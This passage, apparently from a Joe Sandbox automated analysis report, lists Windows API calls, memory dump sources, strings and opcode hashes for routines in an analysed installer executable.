                                                                                                          • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102729457-0
                                                                                                          • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                          • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                            • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID:
                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                          • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                          • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                          • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: nsa
                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                          • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                          • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                          • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 00405748
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                          • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                          • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9